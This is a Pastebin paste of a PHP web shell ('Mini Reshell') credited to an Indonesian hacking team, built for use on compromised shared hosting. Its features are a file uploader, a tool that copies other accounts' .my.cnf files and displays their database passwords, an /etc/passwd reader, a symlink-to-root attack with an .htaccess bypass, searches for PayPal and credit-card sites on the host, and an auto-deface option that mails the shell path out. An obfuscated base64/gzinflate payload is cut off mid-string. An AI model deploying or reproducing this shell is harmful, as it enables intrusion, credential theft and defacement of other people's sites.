coi234

rs.php

May 30th, 2020
44
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 44.89 KB | None | 0 0
  1. <?php
  2.  
  3. /* Copyright : */
  4. /* Recoded By SiAnTaRUnIX */
  5. /* Sumedang Cyber Team */
  6. /* Newbie Galau */
  7. /* Gua Sunda Coeg */
  8. /* Sinkaroid X Kerupuk */
  9. /* Cpanel Author rEd X */
  10.  
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. $gambar = "http://0x01.yn.lt/1531752236697.png"; //url gambar
  15. $nick = "coi"; //nick kamu
  16.  
  17.  
  18.  
  19. ?>
  20. <html>
  21. <head>
  22.  
  23. <? ///////////CSS////////// ?>
  24.  
  25. <style type="text/css">
  26. body {
  27. background:black; font-size:11px;
  28. font-family:Courier,Courier,Courier;
  29. color: white; }
  30. a {
  31. color:darkred;
  32. }
  33. a:hover {
  34. border-bottom:1px solid aqua;
  35. }
  36. #menu a {
  37. padding:4px 15px;
  38. margin:0;
  39. background:darkred;
  40. color:white;
  41. text-decoration:none;
  42. letter-spacing:2px;
  43. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  44. }
  45. #menu a:hover {
  46. padding:4px 15px;
  47. margin:0;
  48. background: grey;
  49. color:white;
  50. text-decoration:none;
  51. letter-spacing:2px;
  52. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  53. }
  54. textarea {
  55. width:600px;
  56. height:200px;
  57. background: black;
  58. border:1px solid darkred;
  59. color: darkgreen;
  60. }
  61. input[type=text] , input[type=file] , select {
  62. background:black;
  63. color:white;border: 1px solid darkred;
  64. padding:6px 6px 6px 6px;
  65. }
  66. input[type=submit] {
  67. background:#b70505;
  68. color:white;border: 1px solid #000;
  69. padding:6px 6px 6px 6px;
  70. }
  71. .subbtn:hover {
  72. background:#c0bfbf;
  73. color:#000000;
  74. }
  75.  
  76. td, th { font-size: 12pt; text-align: left; vertical-align: top; color: dodgerblue; }
  77. h1 { font-size: 16pt; text-align: center; }
  78. h1 a { color: #000000 !important; text-decoration: none; }
  79. p { text-align: center; font-size: 9pt; }
  80. p a { color: #666666 !important; }
  81. table { margin: 0 auto; border-collapse: collapse; border: 1px solid #ffffff; min-width: 400px; }
  82. th, td { padding: 5px 10px; }
  83. th { background: black; color: #ffffff; }
  84. td a { color: dodgerblue !important; text-decoration: none; }
  85. th img { position: relative; top: -3px; left: 2px; }
  86. td { border-bottom: 1px solid #cccccc; background: black; }
  87. tr.odd td { background: black; }
  88.  
  89. #lol a {
  90. padding:4px 15px;
  91. margin:0;
  92. background:darkgreen;
  93. color:white;
  94. text-decoration:none;
  95. letter-spacing:2px;
  96. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  97. }
  98. </style>
  99.  
  100. <? /////////TITLE//////// ?>
  101.  
  102. <title>
  103. --== <?php echo $nick; ?> Mini Reshell ==--</title>
  104. </head>
  105.  
  106. <? ////////MENU///////// ?>
  107.  
  108. <br><center><div id=menu>
  109. <a href=?beby=home>Home</a>
  110. <a href=?beby=config>Grabber</a>
  111. <a href=?beby=cpanel>Cpanel Finder</a>
  112. <a href=?beby=uploads>Uploader</a>
  113. <a href=?beby=domain>Domain</a>
  114. <a href=?beby=tools>Tools</a>
  115.  
  116. </div></center>
  117. <p>
  118. <center>
  119. <img src=<?php echo $gambar; ?> width=320 height=315/><br /></center><br><center><div id=menu>
  120. <a href=?beby=jumper>Jumping</a>
  121. <a href=?beby=reverse>Riverse IP</a>
  122. <a href=?beby=symlink>Symlink</a>
  123. <a href=?beby=info>Info Web</a>
  124. <a href=?beby=quotes>Itachi Quotes</a>
  125.  
  126. </div></center>
  127. <br><center>
  128.  
  129. <? ////////START///////// ?>
  130.  
  131. <?php
  132. //uname
  133. echo '<font color="white">';
  134. echo php_uname();
  135. echo '<br><font color="darkred">Path :</font>';
  136. echo getcwd();
  137. echo '</font>';
  138. //info web
  139. if(isset($_GET['beby']) && ($_GET['beby'] == 'info')){
  140. ?>
  141.  
  142.  
  143.  
  144. <br><br><font size="2pt" color="green">Get Info Website</font>
  145. <form action="?beby" method="GET">
  146. <input type="text" name="beby" value="beby@Codes#~: info"> <input type="submit" value="Cek >> ">
  147. </form>
  148.  
  149.  
  150.  
  151. <?php
  152. }
  153. //info codes
  154. if(isset($_GET['beby']) && ($_GET['beby'] == 'beby@Codes#~: info')){
  155. ?>
  156.  
  157. <form action="?path=<?php echo $path; ?>&amp;beby=" method="post">
  158.  
  159. <?php
  160. $verdad = php_uname('s') . php_uname('r');
  161. $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $verdad . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  162.  
  163.  
  164. echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Name </th><th style="background:darkred;color:white; border-left:1px solid white; text-align:center; "> Info </th></tr> ';
  165. ?>
  166.  
  167. <tr><td>IP</td>
  168. <td style='border-left:1px solid white;' > <?php echo $_SERVER['SERVER_ADDR']; ?></td></tr>
  169.  
  170. <tr><td>User</td>
  171. <td style='border-left:1px solid white;' > uid=<?php echo getmyuid(); ?> gid= <?php echo getmygid(); ?></td></tr>
  172.  
  173. <tr><td>Path</td>
  174. <td style='border-left:1px solid white;' > <?php echo getcwd(); ?></td></tr>
  175.  
  176. <tr><td>PHP Version</td>
  177. <td style='border-left:1px solid white;' > <?php echo phpversion(); ?> </td></tr>
  178.  
  179. <tr><td>Server</td>
  180. <td style='border-left:1px solid white;' ><? echo $_SERVER['SERVER_SOFTWARE']; ?> </td></tr>
  181.  
  182. <tr><td> System </td>
  183. <td style='border-left:1px solid white;' > [ <a href=<? echo $link; ?>'><? echo $verdad; ?></a> ] <?php echo php_uname('v'); ?></td></tr>
  184.  
  185.  
  186.  
  187. <?php
  188.  
  189. echo '<tr><td>';
  190. echo 'Safe Mode </td><td style="border-left:1px solid white;"> ';
  191. if (ini_get('safe_mode') == 0) {
  192. echo "<font color='red'>OFF</font>";
  193. } else {
  194. echo " <font color='green'>ON</font> ";
  195. }
  196.  
  197. echo '</td></tr>';
  198. echo '<tr><td style="border-left:1px solid white;">';
  199.  
  200. echo 'Magic Quotes </td><td style="border-left:1px solid white;"> ';
  201. if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  202. echo "<font color='red'>OFF</font>";
  203. } else {
  204. echo " <font color='green'>ON</font> ";
  205. }
  206. echo '</td></tr></table>';
  207.  
  208. ?>
  209.  
  210. <?php
  211. }
  212. //kosong kak
  213. elseif(isset($_GET['beby']) && ($_GET['beby'] == '')){
  214. ?>
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222. <?php
  223. }
  224. //home
  225. if(isset($_GET['beby']) && ($_GET['beby'] == 'home')){
  226. ?>
  227.  
  228. <?php
  229.  
  230. echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Nama </th><th style="border-left:1px solid white;text-align:center;background:darkred;color:white;"> Disable </th></tr> ';
  231. echo '<tr><td>DisablePHP</td><td style="border-left:1px solid white;">';
  232. $disable_functions = @ini_get("disable_functions");
  233. echo "<font color='darkred'>";
  234. echo $disable_functions;
  235. echo "</font>";
  236. echo '</td></tr></table>';
  237. ?>
  238.  
  239.  
  240. <?php
  241. }
  242. //uploads
  243. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'uploads'))
  244. {
  245. echo"<br><br><form method=post enctype=multipart/form-data>";
  246. echo"<input type=file name=f><input name=k type=submit id=k value=Upload><br>";
  247. if($_POST["k"]==Upload)
  248. {
  249. if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  250. echo"<b>".$_FILES["f"]["name"];
  251. }else{
  252. echo"<b>Gagal upload";
  253. }
  254. }
  255. ?>
  256.  
  257. <?php
  258. }
  259. //cpanel auto crack
  260. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'cpanel')){
  261. @ini_set('display_errors',0);
  262. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  263. $ar0=explode($marqueurDebutLien, $text);
  264. $ar1=explode($marqueurFinLien, $ar0[$i]);
  265. return trim($ar1[0]);
  266. }
  267.  
  268. echo '<br><br>';
  269.  
  270. echo "<center>";
  271. $d0mains = @file('/etc/named.conf');
  272. $domains = scandir("/var/named");
  273.  
  274. if ($domains or $d0mains)
  275. {
  276. $domains = scandir("/var/named");
  277. if($domains) {
  278. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  279. $count=1;
  280. $dc = 0;
  281. $list = scandir("/var/named");
  282. foreach($list as $domain){
  283. if(strpos($domain,".db")){
  284. $domain = str_replace('.db','',$domain);
  285. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  286. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  287. $path = getcwd();
  288.  
  289. if (is_readable($dirz)) {
  290. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  291. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  292. $password=entre2v2($p,'password="','"');
  293. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'>Check Here</a></td></tr>";
  294. $dc++;
  295. }
  296.  
  297. }
  298. }
  299. echo '</table>';
  300. $total = $dc;
  301. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  302. echo '</center>';
  303. }else{
  304. $d0mains = @file('/etc/named.conf');
  305. if($d0mains) {
  306. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  307. $count=1;
  308. $dc = 0;
  309. $mck = array();
  310. foreach($d0mains as $d0main){
  311. if(@eregi('zone',$d0main)){
  312. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  313. flush();
  314. if(strlen(trim($domain[1][0])) >2){
  315. $mck[] = $domain[1][0];
  316. }
  317. }
  318. }
  319. $mck = array_unique($mck);
  320. $usr = array();
  321. $dmn = array();
  322. foreach($mck as $o) {
  323. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  324. $usr[] = $infos['name'];
  325. $dmn[] = $o;
  326. }
  327. array_multisort($usr,$dmn);
  328. $dt = file('/etc/passwd');
  329. $passwd = array();
  330. foreach($dt as $d) {
  331. $r = explode(':',$d);
  332. if(strpos($r[5],'home')) {
  333. $passwd[$r[0]] = $r[5];
  334. }
  335. }
  336. $l=0;
  337. $j=1;
  338. foreach($usr as $r) {
  339. $dirz = '/home/'.$r.'/.my.cnf';
  340. $path = getcwd();
  341. if (is_readable($dirz)) {
  342. copy($dirz, ''.$path.'/'.$r.'.txt');
  343. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  344. $password=entre2v2($p,'password="','"');
  345. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  346. $dc++;
  347. flush();
  348. $l=$l?0:1;
  349. $j++;
  350. }
  351. }
  352. }
  353. echo '</table>';
  354. $total = $dc;
  355. echo '<br><font color="green">Total cPanel Found = '.$total.'</font>';
  356. echo '</center>';
  357.  
  358. }
  359. }else{
  360. echo "<i><font color='green'>ERROR<br>/var/named or etc/named.conf Not Accessible! </font> </i>";
  361. }
  362. ?>
  363.  
  364. <?php
  365. }
  366. //jumping
  367. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'jumper')){
  368. echo '<center>';
  369. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><b><font color="green">Error: safe_mode = on</font></b> </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  370. <br><center>$nick Mini Reshell</center> ');
  371. set_time_limit(0);
  372. ###################
  373. @$passwd = fopen('/etc/passwd','r');
  374. if (!$passwd) { die('<br><b><font color="green">Error : coudn`t read /etc/passwd</font></b> </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By '.$nick.'</font></center><b>
  375. <br><center>'.$nick.' Mini Reshell</center> '); }
  376. $pub = array();
  377. $users = array();
  378. $conf = array();
  379. $i = 0;
  380. while(!feof($passwd))
  381. {
  382. $str = fgets($passwd);
  383. if ($i > 35)
  384. {
  385. $pos = strpos($str,':');
  386. $username = substr($str,0,$pos);
  387. $dirz = '/home/'.$username.'/public_html/';
  388. if (($username != ''))
  389. {
  390. if (is_readable($dirz))
  391. {
  392. array_push($users,$username);
  393. array_push($pub,$dirz);
  394. }
  395. }
  396. }
  397. $i++;
  398. }
  399.  
  400. ###################
  401. echo '<br>';
  402. echo "[+] Founded <font size=10 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
  403. echo "[+] Founded <font color=red size=10> ".sizeof($pub)." </font> readable public_html directories\n"."<br />";
  404. echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  405. foreach ($users as $user)
  406. {
  407. $path = "/home/$user/public_html/";
  408. echo " <table><tr><td> ";
  409. echo "<font color=white>[Ok] <a href='?beby=exploler&path=$path'>$path</a></font><br>";
  410. echo " </td></tr></table> ";
  411. }
  412. echo "\n";
  413. echo '</center>';
  414. ?>
  415.  
  416. <?php
  417. }
  418. //get files jump
  419. elseif(isset($_GET['filesrc'])){
  420. echo "<br><br>Current File : ";
  421. echo $_GET['filesrc'];
  422. echo '<br /><br><table width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%"><tr><td style="background:darkred;color:white;"><b>Code &lt;/&gt;</b></td></tr><tr><td width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%" >';
  423.  
  424. ?>
  425.  
  426. <?php
  427. echo ' <font color="green"> ';
  428. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  429. echo ' </font> ';
  430. ?>
  431.  
  432. <?php
  433.  
  434. echo '</td></tr></table>';
  435. }
  436. //open directory
  437. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'exploler')){
  438. if(isset($_GET['path'])){
  439. $path = $_GET['path'];
  440. }else{
  441. $path = getcwd();
  442. }
  443. $path = str_replace('\\','/',$path);
  444. $paths = explode('/',$path);
  445. echo ' <br><br> <div id="lol"> <font color="darkred"> Current Path : </font><font color="green"> ';
  446. foreach($paths as $id=>$pat){
  447. if($pat == '' && $id == 0){
  448. $a = true;
  449. echo '<a href="?beby=exploler&path=/">Root</a>&nbsp;';
  450. continue;
  451. }
  452. if($pat == '') continue;
  453. echo '<a href="?beby=exploler&path=';
  454. for($i=0;$i<=$id;$i++){
  455. echo "$paths[$i]";
  456. if($i != $id) echo "/";
  457. }
  458. echo '">'.$pat.'</a>&nbsp;';
  459. }
  460. echo ' </font></div> ';
  461.  
  462. $path = getcwd();
  463. if(isset($_GET['path'])){
  464. $path = $_GET['path'];
  465. }else{
  466. $path = getcwd();
  467. }
  468. //scan directory
  469. $scandir = scandir($path);
  470. echo '<br><br><center><table class="bawah"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  471. <tr>
  472. <td style="background:darkred;color:white;"><center>Name</center></td>
  473. <td style="background:darkred;color:white; border-left:1px solid white;"><center>Permissions</center></td>
  474. </tr>';
  475. //for scan directory
  476. foreach($scandir as $dir){
  477. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  478. echo "<tr>
  479. <td> [DIR] <font color=\"dodgerblue\"> <a href=\"?beby=exploler&path=$path/$dir\">$dir</a></font></td>
  480. <td style='border-left:1px solid white;'><center>";
  481. if(is_writable("$path/$dir")) echo '<font color="green">';
  482. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  483. echo perms("$path/$dir");
  484. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  485.  
  486. echo "</center></td>
  487. </tr>";
  488. }
  489. echo '<br>';
  490. //for scan filelist
  491. foreach($scandir as $file){
  492. if(!is_file("$path/$file")) continue;
  493. $size = filesize("$path/$file")/1024;
  494. $size = round($size,3);
  495. if($size >= 1024){
  496. $size = round($size/1024,2).' MB';
  497. }else{
  498. $size = $size.' KB';
  499. }
  500. //mempersingkat nama file
  501. if (strlen($file) > 40) {
  502. $url = substr($file, 0, 35) . "...";
  503. } else {
  504. $url = $file;
  505. }
  506. //starting
  507. echo "<tr>
  508. <td> ★ <font color='dodgerblue'><a href=\"?beby=exploler&filesrc=$path/$file&path=$path\">$url</a></font></td><center><td style='border-left:1px solid white;'><center>";
  509. if(is_writable("$path/$file")) echo '<font color="#FF00FF">';
  510. elseif(!is_readable("$path/$file")) echo '<font color="FFE4E1">';
  511. echo perms("$path/$file");
  512. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  513. echo "</center></td></tr>";
  514.  
  515. }
  516. echo '</table>
  517. </center>';
  518. ?>
  519.  
  520. <?php
  521. }
  522. //empety tools
  523. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'empety')){
  524. ?>
  525.  
  526.  
  527.  
  528. :(
  529.  
  530.  
  531.  
  532. <?php
  533. }
  534. //symlink
  535. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'symlink')) {
  536. echo " <form action= method=post>";
  537. @set_time_limit(0);
  538. echo "<center>";
  539. @mkdir('sym',0777);
  540. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<br><br><font color='green'>Cant access this file on server -> [ /etc/named.conf ]</font></center>"; } else { echo "<table width='700' border='0' cellpadding='3' cellspacing='1' align='center'><td style='background:darkred;color:white;'>Domains</td><td style='background:darkred;color:white;'>Users</td><td style='background:darkred;color:white;'>Symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<font color=red>".$string[1][0].'</font>'; } echo " <tr> <td><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a> </td> <td style=border-left:1px solid white;> '.$UID['name']." </td> <td style=border-left:1px solid white;> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr>"; flush(); } } } } echo "</center></table>";
  541. }
  542. ?>
  543.  
  544. <?php
  545. //reverse IP lookup
  546. if(isset($_GET['beby']) && ($_GET['beby'] == 'reverse'))
  547. {
  548. ?>
  549. <br><br><br>
  550. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'> DNS Reverse IP </a></center>
  551. <br><br>
  552. <center><div id="sitelist"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal"><div id='menu'> Paypal On Server </a></center>
  553. <br><br>
  554. <center><div id="visa"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master"><div id='menu'> CC On Server </a></center>
  555.  
  556. <?php
  557. }
  558. //tools for you
  559. if(isset($_GET['beby']) && ($_GET['beby'] == 'tools'))
  560. {
  561. echo'<center><br><br>
  562. <tr><form method="post" action="">&nbsp;<td>
  563. <select name="pilihan" id="pilih">
  564. <option>-----------------=Select=-----------------</option>
  565. <option value="db">DataBase [Mysql Adminer]</option>
  566. <option value="forbid">Bypass Forbidden Symlink/Config [ .htaccess ]</option>
  567. <option value="auto">Deface! [bie.txt]</option>
  568. </select>
  569. <input type="submit" name="submites" value=" >> ">
  570. </td></form>';
  571. //starting
  572. error_reporting(0);
  573. set_time_limit(0);
  574. $submit = $_POST ['submites'];
  575. if(isset($submit)) {
  576. $pilih = $_POST['pilihan'];
  577. //auto deface
  578. if ( $pilih == 'auto') {
  579. $file = 'Hacked By '.$nick.'';
  580. $r=fopen("bie.txt", "w"); fwrite($r,$file); fclose($r);
  581. $to = "$email";
  582. $subject = "bie.txt";
  583. $header = "Script Deface";
  584. $message = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
  585. $message .= "Pass : ".$auth_pass." Path : " . __file__;
  586. $sentmail = @mail($to, $subject, $message, $header);
  587. echo "<script>alert('done! check bie.txt'); hideAll();</script>";
  588. echo "<p><center><font color=green>Check = >> <a href='bie.txt' target=_blank><b>bie.txt</b></a></font></center>
  589.  
  590.  
  591.  
  592. </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  593. <br><center>$nick Mini Reshell</center>
  594. ";
  595. die();
  596. }
  597. //for database mysql manager
  598. elseif ( $pilih == 'db') {
  599. $script = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JR